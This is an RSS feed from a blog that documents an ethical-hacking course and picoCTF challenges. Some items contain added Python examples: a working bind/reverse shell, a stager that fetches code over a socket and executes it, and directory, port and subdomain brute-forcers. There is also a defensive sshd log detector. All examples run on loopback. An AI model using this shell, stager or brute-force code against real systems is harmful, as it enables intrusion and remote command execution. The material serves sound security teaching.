From Noob to Hacker https://aojanzen.github.io/ Things I have learned along the way en-us Wed, 15 Jun 2022 00:00:00 +0200 https://aojanzen.github.io/2022/06/15/credentialstuffingandpasswordspraying.html https://aojanzen.github.io/2022/06/15/credentialstuffingandpasswordspraying.html <![CDATA[Credential Stuffing and Password Spraying]]> Credential Stuffing and Password Spraying

Credential stuffing means taking breached credentials (e.g. from Breach-Parse or from a website like weleakinfo.to, before it was seized by law enforcement) and trying to use them to log in to an account on a target. Password spraying is the complementary technique: a handful of common passwords is tried against many accounts, one or two attempts each, so that no single account trips a lockout threshold.

Read more...

]]>
Wed, 15 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/12/bruteforceattacks.html https://aojanzen.github.io/2022/06/12/bruteforceattacks.html <![CDATA[Brute Force Attacks]]> Brute Force Attacks

Attacking SSH is not easy. There are three approaches if we want to try it anyway: brute-forcing the login credentials, trying weak credentials, or trying default credentials.
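As an added example for this post and the credential-stuffing/password-spraying post above (this is example code written for this page, not material from the course or the blog), the following Python script looks at the attacks from the defender's side: it parses sshd-style auth log lines and labels each source IP as brute force (many failures against one account) or password spraying (one failure per account across many accounts), and flags a source that logs in successfully right after its failures. The log lines are constructed, the regex only matches the "Failed/Accepted password" message format, and the window and threshold values are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd-style auth log lines (not real data). 203.0.113.5 hammers one
# account (brute force); 198.51.100.9 tries one password per account (spraying)
# and eventually gets in; 192.0.2.44 is a legitimate user who mistyped once.
SAMPLE_LOG = """\
Jun 12 10:00:01 kioptrix sshd[1001]: Failed password for root from 203.0.113.5 port 40001 ssh2
Jun 12 10:00:02 kioptrix sshd[1002]: Failed password for root from 203.0.113.5 port 40002 ssh2
Jun 12 10:00:03 kioptrix sshd[1003]: Failed password for root from 203.0.113.5 port 40003 ssh2
Jun 12 10:00:04 kioptrix sshd[1004]: Failed password for root from 203.0.113.5 port 40004 ssh2
Jun 12 10:00:05 kioptrix sshd[1005]: Failed password for root from 203.0.113.5 port 40005 ssh2
Jun 12 10:00:06 kioptrix sshd[1006]: Failed password for root from 203.0.113.5 port 40006 ssh2
Jun 12 10:01:10 kioptrix sshd[1010]: Failed password for invalid user alice from 198.51.100.9 port 50001 ssh2
Jun 12 10:01:11 kioptrix sshd[1011]: Failed password for bob from 198.51.100.9 port 50002 ssh2
Jun 12 10:01:12 kioptrix sshd[1012]: Failed password for invalid user carol from 198.51.100.9 port 50003 ssh2
Jun 12 10:01:13 kioptrix sshd[1013]: Failed password for dave from 198.51.100.9 port 50004 ssh2
Jun 12 10:01:14 kioptrix sshd[1014]: Failed password for invalid user erin from 198.51.100.9 port 50005 ssh2
Jun 12 10:01:15 kioptrix sshd[1015]: Accepted password for frank from 198.51.100.9 port 50006 ssh2
Jun 12 10:05:00 kioptrix sshd[1020]: Failed password for andreas from 192.0.2.44 port 60001 ssh2
Jun 12 10:05:30 kioptrix sshd[1021]: Accepted password for andreas from 192.0.2.44 port 60002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_auth_log(text, year=2022):
    """Turn sshd log lines into (timestamp, src_ip, user, failed) tuples.
    syslog lines carry no year, so it is passed in."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other sshd messages are not login attempts
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"] == "Failed"))
    return events


def classify_sources(events, window=timedelta(minutes=5), min_failures=5):
    """Label each source IP by the shape of its failures inside a sliding window.

    brute_force:            >= min_failures failures against one or two accounts
    password_spraying:      >= min_failures failures spread over >= min_failures accounts
    success_after_failures: an Accepted login from the same IP follows the failures
    Sources with fewer failures than min_failures get no label (thresholds assumed).
    """
    by_ip = defaultdict(list)
    for ts, ip, user, failed in events:
        by_ip[ip].append((ts, user, failed))

    verdicts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        labels = set()
        for i, (start, _, _) in enumerate(evs):
            in_window = [e for e in evs[i:] if e[0] - start <= window]
            failures = [e for e in in_window if e[2]]
            if len(failures) < min_failures:
                continue
            accounts = {e[1] for e in failures}
            if len(accounts) >= min_failures:
                labels.add("password_spraying")
            elif len(accounts) <= 2:
                labels.add("brute_force")
            # three or four accounts stays unlabelled: too few to call it spraying
            first_failure = failures[0][0]
            if any(not e[2] and e[0] >= first_failure for e in in_window):
                labels.add("success_after_failures")
        if labels:
            verdicts[ip] = labels
    return verdicts
```

The same signal is what fail2ban-style tooling keys on, with one caveat worth remembering on the attacking side: spraying is designed to stay under a per-account lockout threshold, so a per-account counter never sees it; only a per-source (or global) view of distinct accounts within a window does.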

Read more...

]]>
Sun, 12 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/11/manualexploitation.html https://aojanzen.github.io/2022/06/11/manualexploitation.html <![CDATA[Manual Exploitation]]> Manual Exploitation

After gaining root with Metasploit, we gain access to the Kioptrix machine by manual exploitation in this video, using a vulnerability in mod_ssl and an exploit called Open*uck.

Read more...

]]>
Sat, 11 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/10/gainingrootwithmetasploit.html https://aojanzen.github.io/2022/06/10/gainingrootwithmetasploit.html <![CDATA[Gaining Root with Metasploit]]> Gaining Root with Metasploit

This is the culmination of the previous PEH lessons: the first popped shell, using Metasploit against the Samba 2.2.1a vulnerability on port 139 (“trans2open”, a remote buffer overflow).

Read more...

]]>
Fri, 10 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/09/stagedvsnon_stagedpayloads.html https://aojanzen.github.io/2022/06/09/stagedvsnon_stagedpayloads.html <![CDATA[Staged vs Non-Staged Payloads]]> Staged vs Non-Staged Payloads

A payload is the code that is delivered to a target machine through an exploited vulnerability in order to get a shell on that machine. There are different types of payloads: Windows payloads, Linux payloads, Meterpreter payloads, Python payloads, etc. Each of them can be staged or non-staged.
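To make the staged/non-staged difference concrete, here is an added Python example (written for this page, not code from the course or the post). The "payload" is plain Python source instead of shellcode, and the framing (a 4-byte little-endian length followed by the stage) is an assumed convention for the example. In the non-staged variant the exploit carries the whole payload and runs it. In the staged variant the exploit carries only a tiny stager, which connects back to the attacker's handler, pulls the real stage over that connection and executes it in memory; both variants end up running exactly the same code.

```python
import socket
import struct
import threading

# Constructed "stage": the payload logic proper. A real stage (Meterpreter, say)
# is far larger than this, which is the whole reason staging exists.
STAGE_SRC = b"""\
import platform

def run():
    # the payload's real job; here just a host fingerprint
    return "stage executed on " + platform.system()
"""

# Constructed stager: knows nothing but "connect to HOST:PORT, read a
# length-prefixed blob, execute it". HOST and PORT are injected by execute().
STAGER_SRC = b"""\
import socket, struct

def _recv_exact(s, n):
    buf = b""
    while len(buf) < n:
        chunk = s.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed before the stage arrived")
        buf += chunk
    return buf

def run():
    with socket.create_connection((HOST, PORT)) as s:
        (length,) = struct.unpack("<I", _recv_exact(s, 4))
        stage = _recv_exact(s, length)
    ns = {}
    exec(stage, ns)   # the stage is executed in memory, never written to disk
    return ns["run"]()
"""


def execute(src, **env):
    """Run payload source (bytes) in a fresh namespace and call its run()."""
    ns = dict(env)
    exec(src, ns)
    return ns["run"]()


def handler(listener, stage):
    """Attacker-side handler: wait for the stager to call back, then push the stage."""
    conn, _ = listener.accept()
    with conn:
        conn.sendall(struct.pack("<I", len(stage)) + stage)
    listener.close()


def deliver_non_staged(payload_src):
    """Non-staged: everything the payload needs is in the exploit itself."""
    return {"result": execute(payload_src), "bytes_in_exploit": len(payload_src)}


def deliver_staged(stage_src):
    """Staged: the exploit carries only the stager; the stage follows over the
    callback connection, so the size that has to fit into the exploit is fixed
    no matter how big the stage grows."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(target=handler, args=(listener, stage_src), daemon=True)
    t.start()
    result = execute(STAGER_SRC, HOST="127.0.0.1", PORT=port)
    t.join(5)
    return {
        "result": result,
        "bytes_in_exploit": len(STAGER_SRC),
        "bytes_over_callback": 4 + len(stage_src),
    }
```

With a stage this small the stager is actually the bigger of the two, which is the point to take away: staging pays off when the stage is large and the space the exploit gives you is small, at the price of a second network exchange that the handler has to be listening for. In Metasploit's naming the distinction is a single slash: `windows/shell_reverse_tcp` is non-staged, `windows/shell/reverse_tcp` is staged.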

Read more...

]]>
Thu, 09 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/09/enumeratingssh.html https://aojanzen.github.io/2022/06/09/enumeratingssh.html <![CDATA[Enumerating SSH]]> Enumerating SSH

The Nmap scan has revealed that SSH (OpenSSH 2.9p2) is running on the open port 22. If the scan does not show a software version, we can try to find it by connecting to the open port with ssh.

Read more...

]]>
Thu, 09 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/09/scanningwithnessus.html https://aojanzen.github.io/2022/06/09/scanningwithnessus.html <![CDATA[Scanning with Nessus]]> Scanning with Nessus

Nessus is a vulnerability scanner, a tool that is frequently used in penetration testing. It might even be the first tool one uses in an external assessment.

Read more...

]]>
Thu, 09 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/08/reverservsbindshell.html https://aojanzen.github.io/2022/06/08/reverservsbindshell.html <![CDATA[Reverse Shell vs Bind Shell]]> Reverse Shell vs Bind Shell

This is the first section of the “Exploitation Basics” chapter.

In this section, different ways of “popping a shell”, i.e. getting access to a terminal on a target machine, are discussed, in particular the differences between a reverse shell and a bind shell.
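Here is an added example in Python (written for this page; not code from the course or the post) that runs both variants on loopback. The command loop on the target is identical in both cases; the only difference is who opens the TCP connection. In the bind shell the target listens and the operator connects in, in the reverse shell the operator listens and the target connects out. The `<<END>>` marker that frames each command's output is an assumed convention of this example, and the commands are run through the local shell with `subprocess`.

```python
import socket
import subprocess
import threading

END = b"<<END>>\n"  # end-of-output marker (assumed framing for this example)


def run_command(cmd):
    """Execute one shell command line on the target and return its output."""
    proc = subprocess.run(cmd, shell=True, capture_output=True, timeout=10)
    return proc.stdout + proc.stderr


def serve_shell(conn):
    """Command loop used by BOTH variants once a connection exists:
    read a line, run it, send the output back, until 'exit'."""
    with conn, conn.makefile("rb") as lines:
        for line in lines:
            cmd = line.decode().strip()
            if cmd == "exit":
                break
            conn.sendall(run_command(cmd) + END)


def bind_shell(listening_sock):
    """Target side of a bind shell: the target LISTENS, the operator connects in."""
    conn, _ = listening_sock.accept()
    listening_sock.close()
    serve_shell(conn)


def reverse_shell(operator_host, operator_port):
    """Target side of a reverse shell: the target CONNECTS OUT to the operator."""
    serve_shell(socket.create_connection((operator_host, operator_port)))


def operator_session(sock, commands):
    """Operator side: send each command, collect its output, then close."""
    outputs = []
    with sock, sock.makefile("rb") as lines:
        for cmd in commands:
            sock.sendall(cmd.encode() + b"\n")
            buf = b""
            while not buf.endswith(END):
                chunk = lines.readline()
                if not chunk:  # target went away
                    break
                buf += chunk
            outputs.append(buf[: -len(END)] if buf.endswith(END) else buf)
        sock.sendall(b"exit\n")
    return outputs


def demo_bind(commands):
    """Bind shell on loopback: target listens on an ephemeral port, operator connects."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    target = threading.Thread(target=bind_shell, args=(srv,), daemon=True)
    target.start()
    outputs = operator_session(socket.create_connection(("127.0.0.1", port)), commands)
    target.join(5)
    return outputs


def demo_reverse(commands):
    """Reverse shell on loopback: operator listens, target calls back."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    target = threading.Thread(target=reverse_shell, args=("127.0.0.1", port), daemon=True)
    target.start()
    conn, _ = listener.accept()
    listener.close()
    outputs = operator_session(conn, commands)
    target.join(5)
    return outputs
```

The practical consequence of the direction is firewall and NAT traversal: a bind shell needs an inbound port on the target to be reachable, which is rarely the case on a real network, whereas a reverse shell only needs the target to be allowed to make an outbound connection, which is why reverse shells are the default choice.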

Read more...

]]>
Wed, 08 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/06/researchingpotentialvulnerabilities.html https://aojanzen.github.io/2022/06/06/researchingpotentialvulnerabilities.html <![CDATA[Researching Potential Vulnerabilities]]> Researching Potential Vulnerabilities

This blog post is about identifying and researching potential vulnerabilities, starting from the results that we have found for Kioptrix so far.

Read more...

]]>
Mon, 06 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/05/enumeratingsmb.html https://aojanzen.github.io/2022/06/05/enumeratingsmb.html <![CDATA[Enumerating SMB]]> Enumerating SMB

SMB (Server Message Block) is a file-sharing protocol used in networks to upload and download files to and from a shared folder. SMB is typically used in corporate and other internal environments.

Read more...

]]>
Sun, 05 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/04/enumeratinghttpandhttps.html https://aojanzen.github.io/2022/06/04/enumeratinghttpandhttps.html <![CDATA[Enumerating HTTP and HTTPS]]> Enumerating HTTP and HTTPS

In this section, the open ports found with the Nmap scan are examined more closely: additional information about the services running on the web server is gathered, and sub-directories of the website are identified with a tool called DirBuster.
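As an added example of what DirBuster does under the hood (this is example code written for this page, not the tool's code or material from the post): a small Python directory brute-forcer that requests every wordlist entry and keeps the paths that do not answer like "not found". It first requests a random path to learn what the server's real not-found response looks like, so a site that answers 200 to everything (a soft 404) does not produce a page full of false positives. The two target sites are constructed in-process so the example runs offline; the wordlist is a few illustrative words.

```python
import http.client
import http.server
import random
import string
import threading
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, path, timeout=3):
    """One GET request; returns the HTTP status code only."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"User-Agent": "dirbust-example"})
        return conn.getresponse().status
    finally:
        conn.close()


def dirbust(host, port, wordlist, workers=8):
    """Request /word for every wordlist entry and return {path: status} for the
    ones that do not match the server's not-found behaviour. The canary request
    establishes that behaviour instead of assuming it is a 404."""
    canary = "/" + "".join(random.choices(string.ascii_lowercase, k=16))
    not_found_code = probe(host, port, canary)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        codes = list(pool.map(lambda w: probe(host, port, "/" + w), wordlist))
    return {"/" + w: c for w, c in zip(wordlist, codes) if c != not_found_code}


class FakeSite(http.server.BaseHTTPRequestHandler):
    """Constructed target: a few known paths, everything else answers DEFAULT."""
    ROUTES = {"/": 200, "/admin": 403, "/backup": 200, "/robots.txt": 200}
    DEFAULT = 404

    def do_GET(self):
        self.send_response(self.ROUTES.get(self.path, self.DEFAULT))
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


class Soft404Site(FakeSite):
    """Constructed misbehaving target that answers 200 for any unknown path."""
    DEFAULT = 200


WORDLIST = ["admin", "backup", "images", "robots.txt", "uploads"]


def run_against(handler_cls, wordlist=WORDLIST):
    """Start an in-process target, brute-force it, shut it down."""
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    host, port = srv.server_address
    try:
        return dirbust(host, port, wordlist)
    finally:
        srv.shutdown()
        srv.server_close()


def demo_normal():
    return run_against(FakeSite)


def demo_soft404():
    return run_against(Soft404Site)
```

Against the soft-404 site only `/admin` (403) survives, because the real `/backup` and `/robots.txt` answer with the same 200 as the junk path; status codes alone cannot tell them apart there, which is why real tools fall back to comparing response length or body content next. A 403 is still a finding: the path exists, you are just not allowed in yet.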

Read more...

]]>
Sat, 04 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/03/scanningwithnmap.html https://aojanzen.github.io/2022/06/03/scanningwithnmap.html <![CDATA[Scanning with Nmap]]> Scanning with Nmap

In this section, we learn how to use Nmap to scan a target machine for open ports and for the services running on it, which can then be exploited in the next step.
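An added example that covers this post and the SSH version check from the “Enumerating SSH” post above (example code written for this page, not from the course or either post): a TCP connect scanner in Python, the same kind of scan `nmap -sT` performs, that also reads whatever the service sends right after the handshake. SSH is a "server speaks first" protocol, so the identification line arrives without sending anything, and parsing it yields the protocol and software version that Nmap's `-sV` would report. The fake sshd on loopback and its ident line (modelled on OpenSSH 2.9p2) are constructed for the demo; the closed port is an ephemeral port that is grabbed and released so it is known to be closed.

```python
import re
import socket
import threading

# SSH-protoversion-softwareversion, e.g. b"SSH-1.99-OpenSSH_2.9p2"
SSH_IDENT = re.compile(rb"^SSH-(?P<proto>[\d.]+)-(?P<software>\S+)")


def scan_port(host, port, timeout=1.0):
    """TCP connect scan of one port: return (is_open, banner_bytes).
    Services that speak first hand over their banner on a bare connect."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(256)
            except socket.timeout:
                banner = b""  # open, but the service waits for the client to talk
            return True, banner
    except OSError:  # refused, timed out, unreachable
        return False, b""


def parse_ssh_banner(banner):
    """Pull protocol and software versions out of an SSH identification string."""
    m = SSH_IDENT.match(banner)
    if not m:
        return None
    return {"protocol": m["proto"].decode(), "software": m["software"].decode()}


def scan(host, ports, timeout=1.0):
    """Scan the given ports; for each open one keep the banner and, if it is SSH,
    the parsed version."""
    results = {}
    for port in ports:
        is_open, banner = scan_port(host, port, timeout)
        if is_open:
            results[port] = {"banner": banner, "ssh": parse_ssh_banner(banner)}
    return results


def fake_ssh_server(ident=b"SSH-1.99-OpenSSH_2.9p2\r\n"):
    """Constructed stand-in for an old sshd: accepts one connection, sends the
    ident line, hangs up. Returns the port it listens on."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(ident)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def free_closed_port():
    """Bind an ephemeral port and release it so the scan sees it closed."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def demo():
    ssh_port = fake_ssh_server()
    closed_port = free_closed_port()
    found = scan("127.0.0.1", [closed_port, ssh_port])
    return {"ssh_port": ssh_port, "closed_port": closed_port, "found": found}
```

Two things the toy makes visible that matter on a real engagement: a connect scan completes the handshake, so it shows up in the target's logs (the `Connection closed by ... [preauth]` lines sshd writes), and a banner is a claim, not proof. The version string comes from the server's configuration and can be changed or stripped, so it is a lead for vulnerability research, to be confirmed, not a finding on its own.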

Read more...

]]>
Fri, 03 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/03/installingkioptrix.html https://aojanzen.github.io/2022/06/03/installingkioptrix.html <![CDATA[Installing Kioptrix]]> Installing Kioptrix

This is the beginning of the “Scanning and Enumeration” section of “Practical Ethical Hacking”. We will use a vulnerable virtual machine called Kioptrix.

Read more...

]]>
Fri, 03 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/03/utilizingsocialmedia.html https://aojanzen.github.io/2022/06/03/utilizingsocialmedia.html <![CDATA[Utilizing Social Media]]> Utilizing Social Media

Websites like LinkedIn or Twitter can deliver valuable information, too, e.g. badge photos or desk photos.

Read more...

]]>
Fri, 03 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/02/googlefu.html https://aojanzen.github.io/2022/06/02/googlefu.html <![CDATA[Google Fu]]> Google Fu

Google is an extremely helpful source of information for pentesters, and knowing how to use it well is part of what makes a successful pentester.

Read more...

]]>
Thu, 02 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/02/informationgatheringwithburpsuite.html https://aojanzen.github.io/2022/06/02/informationgatheringwithburpsuite.html <![CDATA[Information Gathering with Burp Suite]]> Information Gathering with Burp Suite

Burp Suite is a web proxy that can intercept web traffic for us. The Community Edition has limited functionality: one can only select Temporary Project on startup, then click Start Burp (using the Burp defaults).

Read more...

]]>
Thu, 02 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/01/huntingsubdomains.html https://aojanzen.github.io/2022/06/01/huntingsubdomains.html <![CDATA[Hunting Subdomains (Parts 1 and 2)]]> Hunting Subdomains (Parts 1 and 2)

One of the first steps in reconnaissance is to find out which subdomains belong to the target. One reason is that one might find subdomains that should not be publicly accessible, e.g. dev.tesla.com; another is that it gives us a chance to attack multiple websites instead of only one.
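As an added example (written for this page; not code from the course or the post), the brute-force half of subdomain hunting in Python: prepend each word of a list to the domain and see which names resolve. The one check worth building in from the start is for wildcard DNS: if a random label under the domain resolves, every guess will "exist", so the address a random label resolves to is recorded and any hit pointing at it is discarded. The resolver is injectable; the default is the real `socket.gethostbyname`, and the zones used here are constructed dictionaries so the example runs offline.

```python
import random
import socket
import string
from concurrent.futures import ThreadPoolExecutor


def wildcard_address(domain, resolve):
    """Resolve a random label under the domain. If it resolves, the zone has a
    wildcard record; return that address so it can be ignored later."""
    label = "".join(random.choices(string.ascii_lowercase, k=20))
    try:
        return resolve(f"{label}.{domain}")
    except socket.gaierror:
        return None


def bruteforce_subdomains(domain, words, resolve=socket.gethostbyname, workers=16):
    """Return {fqdn: ip} for every word.domain that resolves to something other
    than the zone's wildcard address (if it has one)."""
    wildcard = wildcard_address(domain, resolve)

    def try_one(word):
        fqdn = f"{word}.{domain}"
        try:
            return fqdn, resolve(fqdn)
        except socket.gaierror:
            return fqdn, None

    with ThreadPoolExecutor(max_workers=workers) as pool:
        hits = list(pool.map(try_one, words))
    return {fqdn: ip for fqdn, ip in hits if ip is not None and ip != wildcard}


# Constructed zones standing in for real DNS. wild.example.net has a wildcard
# record (*.wild.example.net -> 198.51.100.1) plus one real host.
FAKE_ZONE = {
    "www.example.com": "192.0.2.10",
    "dev.example.com": "192.0.2.11",
    "mail.example.com": "192.0.2.12",
    "vpn.wild.example.net": "198.51.100.7",
}


def fake_resolve(name):
    if name in FAKE_ZONE:
        return FAKE_ZONE[name]
    if name.endswith(".wild.example.net"):
        return "198.51.100.1"
    raise socket.gaierror(-2, "Name or service not known")


WORDS = ["www", "dev", "mail", "staging", "vpn", "admin"]


def demo_plain():
    return bruteforce_subdomains("example.com", WORDS, resolve=fake_resolve)


def demo_wildcard():
    return bruteforce_subdomains("wild.example.net", WORDS, resolve=fake_resolve)
```

Without the wildcard check, `demo_wildcard()` would report all six names as live; with it, only `vpn.wild.example.net` survives because it resolves to a different address. A brute-forced name that resolves is still only a DNS record, not a reachable host, so the results feed the port scan rather than replace it.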

Read more...

]]>
Wed, 01 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/06/01/identifyingwebsitetechnologies.html https://aojanzen.github.io/2022/06/01/identifyingwebsitetechnologies.html <![CDATA[Identifying Website Technologies]]> Identifying Website Technologies

In this lecture, TCM presents several tools for analysing which technologies and frameworks were used to build a website.

Read more...

]]>
Wed, 01 Jun 2022 00:00:00 +0200
https://aojanzen.github.io/2022/05/30/huntingbreachedpasswordswithdehashed.html https://aojanzen.github.io/2022/05/30/huntingbreachedpasswordswithdehashed.html <![CDATA[Hunting Breached Credentials with DeHashed]]> Hunting Breached Credentials with DeHashed

TCM demonstrates a website called DeHashed.com, which is only available as a paid service and can only be paid in cryptocurrency.

Read more...

]]>
Mon, 30 May 2022 00:00:00 +0200
https://aojanzen.github.io/2022/05/29/gatheringbreachedcredentials.html https://aojanzen.github.io/2022/05/29/gatheringbreachedcredentials.html <![CDATA[Gathering Breached Credentials with Breach-Parse]]> Gathering Breached Credentials with Breach-Parse

Finding user names and passwords in breached credentials is a very important step and part of every pentest.

Read more...

]]>
Sun, 29 May 2022 00:00:00 +0200
https://aojanzen.github.io/2022/05/28/takingnotes.html https://aojanzen.github.io/2022/05/28/takingnotes.html <![CDATA[Taking Notes]]> Taking Notes

Use note-keeping tools to write key information down for later reference. Write down the actual commands and take screenshots!

Read more...

]]>
Sat, 28 May 2022 00:00:00 +0200
https://aojanzen.github.io/2022/05/28/passivereconnaissanceoverview.html https://aojanzen.github.io/2022/05/28/passivereconnaissanceoverview.html <![CDATA[An Overview of Passive Recon(naissance)]]> An Overview of Passive Recon(naissance)

Passive reconnaissance means gathering information that is already available on the internet, whereas active reconnaissance begins with scanning hosts.

Read more...

]]>
Sat, 28 May 2022 00:00:00 +0200
https://aojanzen.github.io/2022/05/28/identifyingourtarget.html https://aojanzen.github.io/2022/05/28/identifyingourtarget.html <![CDATA[Identifying Our Target]]> Identifying Our Target

To find a client that we can attack legally in order to practice reconnaissance, we use the public bug bounty platform bugcrowd.com.

Read more...

]]>
Sat, 28 May 2022 00:00:00 +0200
https://aojanzen.github.io/2022/05/28/discoveringemailadresses.html https://aojanzen.github.io/2022/05/28/discoveringemailadresses.html <![CDATA[Discovering Email Addresses]]> Discovering Email Addresses

In this part, it is demonstrated how one can find and verify email addresses as part of the reconnaissance on a target.

Read more...

]]>
Sat, 28 May 2022 00:00:00 +0200
https://aojanzen.github.io/2022/05/28/introductionpython.html https://aojanzen.github.io/2022/05/28/introductionpython.html <![CDATA[Introduction to Python]]> Introduction to Python

This is part of the “Introduction to Python” module of TCM Sec’s “Practical Ethical Hacking” course. I have left out most of the material, which covers a basic introduction to Python. The rest is an application of Python for network programming.

Read more...

]]>
Sat, 28 May 2022 00:00:00 +0200
https://aojanzen.github.io/2022/05/28/fivestagesofethicalhacking.html https://aojanzen.github.io/2022/05/28/fivestagesofethicalhacking.html <![CDATA[The Five Stages of Ethical Hacking]]> The Five Stages of Ethical Hacking

The five stages of ethical hacking are the same whether you hack into a network or a website:

Read more...

]]>
Sat, 28 May 2022 00:00:00 +0200
https://aojanzen.github.io/2022/05/25/scriptingwithbash.html https://aojanzen.github.io/2022/05/25/scriptingwithbash.html <![CDATA[Scripting with Bash]]> Scripting with Bash

This post is based on TCM Sec’s “Practical Ethical Hacking” course. It is the last topic in the “Introduction to Linux” chapter.

Read more...

]]>
Wed, 25 May 2022 00:00:00 +0200
https://aojanzen.github.io/2022/05/22/introductiontolinux.html https://aojanzen.github.io/2022/05/22/introductiontolinux.html <![CDATA[Introduction to Linux]]> Introduction to Linux

The following notes are based on TCM Security’s ‘Practical Ethical Hacking’. They refer to the Kali Linux operating system.

Read more...

]]>
Sun, 22 May 2022 00:00:00 +0200
https://aojanzen.github.io/2022/05/21/networkingrefresher.html https://aojanzen.github.io/2022/05/21/networkingrefresher.html <![CDATA[Networking Refresher]]> Networking Refresher

The following notes are based on TCM Security’s ‘Practical Ethical Hacking’. They provide a short refresher of the most important concepts of networks.

Read more...

]]>
Sat, 21 May 2022 00:00:00 +0200
https://aojanzen.github.io/2022/04/12/rps.html https://aojanzen.github.io/2022/04/12/rps.html <![CDATA[picoCTF: RPS]]> picoCTF: RPS

Another challenge from picoCTF 2022, worth 200 points.

Read more...

]]>
Tue, 12 Apr 2022 00:00:00 +0200
https://aojanzen.github.io/2022/04/12/fresh_java.html https://aojanzen.github.io/2022/04/12/fresh_java.html <![CDATA[picoCTF: Fresh Java]]> picoCTF: Fresh Java

Another CTF challenge from picoCTF 2022 for 200 points.

Read more...

]]>
Tue, 12 Apr 2022 00:00:00 +0200
https://aojanzen.github.io/2022/04/06/unpackme_py.html https://aojanzen.github.io/2022/04/06/unpackme_py.html <![CDATA[picoCTF: unpackme.py]]> picoCTF: unpackme.py

Another challenge from picoCTF 2022, worth 200 points.

Read more...

]]>
Wed, 06 Apr 2022 00:00:00 +0200
https://aojanzen.github.io/2022/04/06/local_authority.html https://aojanzen.github.io/2022/04/06/local_authority.html <![CDATA[picoCTF: Local Authority]]> picoCTF: Local Authority

Another challenge from picoCTF 2022, worth 100 points:

Read more...

]]>
Wed, 06 Apr 2022 00:00:00 +0200
https://aojanzen.github.io/2022/04/04/picoctf_sqli_lite.html https://aojanzen.github.io/2022/04/04/picoctf_sqli_lite.html <![CDATA[picoCTF: SQLiLite]]> picoCTF: SQLiLite

The following challenge was part of the picoCTF 2022 contest: a SQL injection, worth 300 points:

Read more...

]]>
Mon, 04 Apr 2022 00:00:00 +0200
https://aojanzen.github.io/2022/04/04/picoctf_basic_file_exploit.html https://aojanzen.github.io/2022/04/04/picoctf_basic_file_exploit.html <![CDATA[picoCTF: basic-file-exploit]]> picoCTF: basic-file-exploit

This is my first writeup about a CTF challenge. The following was the first task in the 100-point (i.e. lowest) category of the 2022 picoCTF challenge:

Read more...

]]>
Mon, 04 Apr 2022 00:00:00 +0200
https://aojanzen.github.io/2022/03/28/hello_world.html https://aojanzen.github.io/2022/03/28/hello_world.html <![CDATA[Hello World!]]> Hello World!

Hi! My name is Andreas, I am from Germany. Let me share a few words about what happened so far…

Read more...

]]>
Mon, 28 Mar 2022 00:00:00 +0200